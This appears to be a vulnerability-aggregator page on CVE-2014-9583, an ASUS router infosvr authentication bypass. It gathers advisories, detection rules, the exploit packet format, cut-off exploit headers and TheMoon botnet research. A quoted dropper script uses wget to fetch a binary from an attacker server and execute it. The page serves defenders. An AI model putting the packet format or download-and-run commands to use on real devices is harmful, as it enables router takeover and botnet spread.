CVE-2014-9583
published 2015-01-08CVE-2014-9583: common.c in infosvr in ASUS WRT firmware 3.0.0.4.376_1071, 3.0.0.376.2524-g0013f52, and other versions, as used in RT-AC66U, RT-N66U, and other routers, does…
PriorityP183critical10CVSS 2.0
AVNACLAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
80.73%
99.6th percentile
common.c in infosvr in ASUS WRT firmware 3.0.0.4.376_1071, 3.0.0.376.2524-g0013f52, and other versions, as used in RT-AC66U, RT-N66U, and other routers, does not properly check the MAC address for a request, which allows remote attackers to bypass authentication and execute arbitrary commands via a NET_CMD_ID_MANU_CMD packet to UDP port 9999. NOTE: this issue was incorrectly mapped to CVE-2014-10000, but that ID is invalid due to its use as an example of the 2014 CVE ID syntax change.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| asus | wrt_firmware | — | — |
| asus | wrt_firmware | — | — |
| t-mobile | tm-ac1900 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
0C 15 33 00 [4 random bytes] 00*38 <LE word: cmd_len> <cmd>
sigma↗
1130327 EXPLOIT ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution (CVE-2014-9583)
- →Detect UDP packets to port 9999 with the NET_CMD_ID_MANU_CMD opcode. The exploit packet starts with bytes 0x0C 0x15 0x33 0x00 and is padded to 512 bytes total. ↗
- →The exploit response packet has PacketType byte == 0x16 (22 decimal) at offset 1 and total length of 512 bytes; filter for UDP/9999 responses matching this signature. ↗
- →Monitor for the TheMoon bot dropping and executing a hidden file named '.nttpd' in /tmp on MIPS Linux devices; the file is fetched via wget from an attacker-controlled HTTP server. ↗
- →After compromise, the TheMoon bot installs iptables rules to block other attackers from re-exploiting CVE-2014-9583 (UDP/9999) and opens UDP/5143 for P2P C2 communication; anomalous iptables modifications on ASUS routers are a strong post-exploitation indicator. ↗
- →The Metasploit module for this CVE launches a BusyBox Telnet daemon on port 4444 (default TelnetPort option) after exploitation; detect unexpected telnet listeners on ASUS routers. ↗
- →The MAC address field in the infosvr packet is not properly validated (memcpy instead of memcmp); any crafted packet with a zeroed or arbitrary MAC field targeting UDP/9999 should be treated as an exploitation attempt. ↗
- →The TheMoon bot communicates with peers over TCP/4543 to download and execute additional payloads; monitor for outbound TCP/4543 connections from ASUS router IPs. ↗
- ·The exploit only works from the LAN side by default; the infosvr service listens on the LAN bridge interface, so external internet-facing detection may not be applicable unless the router is misconfigured. ↗
- ·Command payload is limited to 237 usable bytes; strings longer than 237 bytes cause a buffer overflow and may crash the infosvr service rather than executing the command. ↗
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-hv57-64g7-457f: common
ghsa_unreviewed·2022-05-14
CVE-2014-9583 [HIGH] GHSA-hv57-64g7-457f: common
common.c in infosvr in ASUS WRT firmware 3.0.0.4.376_1071, 3.0.0.376.2524-g0013f52, and other versions, as used in RT-AC66U, RT-N66U, and other routers, does not properly check the MAC address for a request, which allows remote attackers to bypass authentication and execute arbitrary commands via a NET_CMD_ID_MANU_CMD packet to UDP port 9999. NOTE: this issue was incorrectly mapped to CVE-2014-10000, but that ID is invalid due to its use as an example of the 2014 CVE ID syntax change.
VulnCheck
ASUS WRT firmware common.c in infosvr Remote Code Execution
vulncheck·2014·CVSS 10.0
CVE-2014-9583 [CRITICAL] ASUS WRT firmware common.c in infosvr Remote Code Execution
ASUS WRT firmware common.c in infosvr Remote Code Execution
common.c in infosvr in ASUS WRT firmware 3.0.0.4.376_1071, 3.0.0.376.2524-g0013f52, and other versions, as used in RT-AC66U, RT-N66U, and other routers, does not properly check the MAC address for a request, which allows remote attackers to bypass authentication and execute arbitrary commands via a NET_CMD_ID_MANU_CMD packet to UDP port 9999. NOTE: this issue was incorrectly mapped to CVE-2014-10000, but that ID is invalid due to its use as an example of the 2014 CVE ID syntax change.
Affected: t-mobile tm-ac1900
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.trendmicro.com/en_us/res
No detection rules found.
Exploit-DB
ASUS infosvr - Authentication Bypass Command Execution (Metasploit)
exploitdb·2018-04-24
CVE-2014-9583 ASUS infosvr - Authentication Bypass Command Execution (Metasploit)
ASUS infosvr - Authentication Bypass Command Execution (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'ASUS infosvr Auth Bypass Command Execution',
'Description' => %q{
This module exploits an authentication bypass vulnerability in the
infosvr service running on UDP port 9999 on various ASUS routers to
execute arbitrary commands as root.
This module launches the BusyBox Telnet daemon on the port specified
in the TelnetPort option to gain an interactive remote shell.
This module was tested successfully on an ASUS RT-N12E with firmware
version 2.0.0.35.
Numerous ASUS models are reportedly affected, but untested.
},
'Author' =>
[
'Friedrich Postelstorfer', #
Exploit-DB
ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution
exploitdb·2015-01-04
CVE-2014-9583 ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution
ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution
---
#!/usr/bin/env python3
# Exploit Title: ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution
# Date: 2014-10-11
# Vendor Homepage: http://www.asus.com/
# Software Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/FW_RT_N66U_30043762524.zip
# Source code: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/GPL_RT_N66U_30043762524.zip
# Tested Version: 3.0.0.4.376_1071-g8696125
# Tested Device: RT-N66U
# Description:
# A service called "infosvr" listens on port 9999 on the LAN bridge.
# Normally this service is used for device discovery using the
# "ASUS Wireless Router Device Discovery Utility", but this service contains a
# feature that allows an unauthenticated user on the LAN to execute commands
# ', file=sys.
Metasploit
ASUS infosvr Auth Bypass Command Execution
metasploit
ASUS infosvr Auth Bypass Command Execution
ASUS infosvr Auth Bypass Command Execution
This module exploits an authentication bypass vulnerability in the infosvr service running on UDP port 9999 on various ASUS routers to execute arbitrary commands as root. This module launches the BusyBox Telnet daemon on the port specified in the TelnetPort option to gain an interactive remote shell. This module was tested successfully on an ASUS RT-N12E with firmware version 2.0.0.35. Numerous ASUS models are reportedly affected, but untested.
Trendmicro
VPNFilter-affected Devices Still Riddled with 19 Bugs
blogs_trendmicro·2018-07-13
VPNFilter-affected Devices Still Riddled with 19 Bugs
IoT
## VPNFilter-affected Devices Still Riddled with 19 Bugs
This blog tackles the VPNFilter malware and if deployed devices are vulnerable to it. Based on our data, plenty of the devices are still using old firmware versions. In fact, 19 known vulnerabilities can still be detected in devices up to this day.
By: Tony Yang, Peter Lee Jul 13, 2018 Read time: ( words)
Save to Folio
Our IoT scanning tool allows users to identify if connected devices (e.g. routers, network attached storage devices, IP cameras, and printers) in a given network are vulnerable to security risks and vulnerabilities, such as those related to Mirai, Reaper, and WannaCry.
We gather our data from the Trend Micro™ Home Network Security solution and HouseCall™ for Home Networks scanner. HouseCall for Home Networks
Trendmicro
VPNFilter-affected Devices Still Riddled with 19 Bugs
blogs_trendmicro·2018-07-13
VPNFilter-affected Devices Still Riddled with 19 Bugs
IoT
# VPNFilter-affected Devices Still Riddled with 19 Bugs
This blog tackles the VPNFilter malware and if deployed devices are vulnerable to it. Based on our data, plenty of the devices are still using old firmware versions. In fact, 19 known vulnerabilities can still be detected in devices up to this day.
By: Tony Yang, Peter Lee
2018/07/13
Read time: ( words)
Save to Folio
Our IoT scanning tool allows users to identify if connected devices (e.g. routers, network attached storage devices, IP cameras, and printers) in a given network are vulnerable to security risks and vulnerabilities, such as those related to Mirai, Reaper, and WannaCry.
We gather our data from the Trend Micro™ Home Network Security solution and HouseCall™ for Home Networks scanner. HouseCall for Home Networks is
Trendmicro
VPNFilter-affected Devices Still Riddled with 19 Bugs
blogs_trendmicro·2018-07-13
VPNFilter-affected Devices Still Riddled with 19 Bugs
IoT
## VPNFilter-affected Devices Still Riddled with 19 Bugs
This blog tackles the VPNFilter malware and if deployed devices are vulnerable to it. Based on our data, plenty of the devices are still using old firmware versions. In fact, 19 known vulnerabilities can still be detected in devices up to this day.
By: Tony Yang, Peter Lee 2018/07/13 Read time: ( words)
Save to Folio
Our IoT scanning tool allows users to identify if connected devices (e.g. routers, network attached storage devices, IP cameras, and printers) in a given network are vulnerable to security risks and vulnerabilities, such as those related to Mirai, Reaper, and WannaCry.
We gather our data from the Trend Micro™ Home Network Security solution and HouseCall™ for Home Networks scanner. HouseCall for Home Networks is
Trendmicro
Identifying Top Vulnerabilities in Networks
blogs_trendmicro·2018-05-29
Identifying Top Vulnerabilities in Networks
IoT
# Identifying Top Vulnerabilities in Networks
Our findings homed in on known vulnerabilities, IoT botnets with top vulnerability detections, and devices that are affected. Our scanning covered different OSs, including Linux, Mac, Windows, Android, iOS, and other SDK platforms.
By: Tony Yang, Adam Huang, Louis Tsai
2018/05/29
Read time: ( words)
Save to Folio
We have noted time and again how compromising networks and connected devices is rooted in finding weak points in the system. Often, these are in the form of vulnerabilities. Worse, vulnerabilities that aren’t even new. In the context of the internet of things (IoT) and noteworthy security incidents related to it, these vulnerabilities have afforded attackers means to use unsecure devices to facilitate malicious activities suc
Fortinet
TheMoon - A P2P botnet targeting Home Routers
blogs_fortinet·2016-10-20·CVSS 10.0
CVE-2014-9583 [CRITICAL] TheMoon - A P2P botnet targeting Home Routers
FORTIGUARD LABS THREAT RESEARCH
TheMoon - A P2P botnet targeting Home Routers
By Bing Liu | October 20, 2016
In the post “Home Routers - New Favorite of Cybercriminals in 2016”, we discussed the active detection of vulnerability CVE-2014-9583 in ASUS routers since June of this year. In this post we will dissect a bot installed on the affected ASUS routers.
The following figure shows attack traffic captured through Wireshark.
Figure 1 Exploitation of CVE-2014-9583
Below is the content of file nmlt1.sh downloaded from hxxp://78.128.92.137:80/.
#!/bin/sh
cd /tmp
rm -f .nttpd
wget -O .nttpd http://78.128.92.137/.nttpd,17-mips-le-t1
chmod +x .nttpd
./.nttpd
The vulnerable ASUS router will download and execute the binary file .nttpd from the attacker controlled website. The following
arXiv
HADES-IoT: A Practical Host-Based Anomaly Detection System for IoT Devices (Extended Version)
arxiv_fulltext·2019-05-03
HADES-IoT: A Practical Host-Based Anomaly Detection System for IoT Devices (Extended Version)
[HADES-IoT: A Practical Host-Based Anomaly Detection System for IoT Devices]HADES-IoT: A Practical Host-Based Anomaly Detection System for IoT Devices (Extended Version)
Dominik Breitenbacher
Singapore University of Technology and Design
[email protected]
Ivan Homoliak
Singapore University of Technology and Design
[email protected]
Yan Lin Aung
Singapore University of Technology and Design
[email protected]
Nils Ole Tippenhauer
0000-0001-8424-2602
CISPA Helmholtz Center for Information Security
[email protected]
Yuval Elovici
Singapore University of Technology and Design
[email protected]
## Abstract
Internet of Things (IoT) devices have become ubiquitous and are spread across many application domains including the industry, transportation
arXiv
Technical Aspects of Cyber Kill Chain
arxiv_fulltext·2016-06-10
Technical Aspects of Cyber Kill Chain
Technical Aspects of Cyber Kill Chain
Tarun Yadav
Scientist, Defence Research and\ Organisation, INDIA\ : [email protected]
Rao Arvind Mallari
Scientist, Defence Research and\ Organisation, INDIA\ :[email protected]
## Abstract
Recent trends in targeted cyber-attacks has increased the interest of research in the field of cyber security. Such attacks have massive disruptive effects on organizations, enterprises and governments. Cyber kill chain is a model to describe cyber-attacks so as to develop incident response and analysis capabilities. Cyber kill chain in simple terms is an attack chain, the path that an intruder takes to penetrate information systems over time to execute an attack on the target. This paper broadly categories the methodologies, techniques and tools involv
http://packetstormsecurity.com/files/129815/ASUSWRT-3.0.0.4.376_1071-LAN-Backdoor-Command-Execution.htmlhttp://www.exploit-db.com/exploits/35688https://github.com/jduck/asus-cmdhttps://support.t-mobile.com/docs/DOC-21994https://www.exploit-db.com/exploits/44524/http://packetstormsecurity.com/files/129815/ASUSWRT-3.0.0.4.376_1071-LAN-Backdoor-Command-Execution.htmlhttp://www.exploit-db.com/exploits/35688https://github.com/jduck/asus-cmdhttps://support.t-mobile.com/docs/DOC-21994https://www.exploit-db.com/exploits/44524/
2015-01-08
Published
Exploited in the wild